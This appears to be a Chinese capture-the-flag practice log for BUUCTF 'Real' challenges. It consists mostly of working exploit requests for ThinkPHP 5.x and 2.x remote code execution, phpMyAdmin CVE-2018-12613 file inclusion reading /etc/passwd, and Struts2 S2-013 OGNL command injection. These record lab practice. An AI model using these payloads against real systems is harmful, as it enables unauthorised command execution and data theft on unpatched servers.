zoukankan      html  css  js  c++  java

  • BUU_Real_刷题记录

    [ThinkPHP]5-Rce

    v5.0.23及v5.1.31以下版本远程命令执行漏洞

    http://node3.buuoj.cn:29858/index.php
?s=index/thinkapp/invokefunction
&function=call_user_func_array
&vars[0]=system
&vars[1][]=whoami

     获得flag

    http://node3.buuoj.cn:26215/index.php?s=index/thinkapp/invokefunction
&function=call_user_func_array
&vars[0]=phpinfo
&vars[1][]=-1

    Thinkphp5 RCE总结

    [ThinkPHP]5.0.23-Rce

    POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:25184
Content-Length: 76
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Origin: http://node3.buuoj.cn:25184
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://node3.buuoj.cn:25184/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=ls
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

_method=__construct&filter[]=system&server[REQUEST_METHOD]=php -i&method=get

    [ThinkPHP]2-Rce

    http://node3.buuoj.cn:28705/index.php/Index/index/name/${@phpinfo()}

http://node3.buuoj.cn:28705/index.php/Index/index/name/${@system(pwd)}

    Thinkphp2.1漏洞利用

    ThinkPHP系列漏洞之ThinkPHP 2.x 任意代码执行

    [PHPMYADMIN]CVE-2018-12613

    http://node3.buuoj.cn:28623/index.php?target=sql.php%253F/../../../../../../etc/passwd

    phpadmin执行 select “<?php phpinfo();?>”

    GET /index.php?target=tbl_sql.php%253F/../../../../../../../../../../../../../../tmp/sess_672a9aa66b158e4b49d9c1892d0a30c8 HTTP/1.1
Host: node3.buuoj.cn:28623
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: pma_lang=zh_CN; phpMyAdmin=672a9aa66b158e4b49d9c1892d0a30c8; auto_saved_sql_sort=
Connection: close

     phpMyAdmin 4.8.x LFI to RCE

    [struts2]s2-013

    http://node3.buuoj.cn:26757/link.action
?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

    Struts2再爆远程代码执行漏洞

    env: 用于显示系统中已存在的环境变量,以及在定义的环境中执行指令。变量定义:定义在新的环境中变量,定义多个变量定义用空格隔开。格式为“变量名=值”;

    [struts2]s2-045
  • 相关阅读:
    用场景来规划测试工作
    冲刺第二十天 到二十二天
    冲刺第十九天
    冲刺第十八天
    阅读《构建之法》第13-17章(包含读后感)
    冲刺第5,6天(5月25,26日)
    冲刺第四天(2天合一起当一篇随笔,明天会在这篇里继续更新)
    冲刺第二天
    作业5.2
    作业5.1
  • 原文地址:https://www.cnblogs.com/chrysanthemum/p/13681983.html
Copyright © 2011-2022 走看看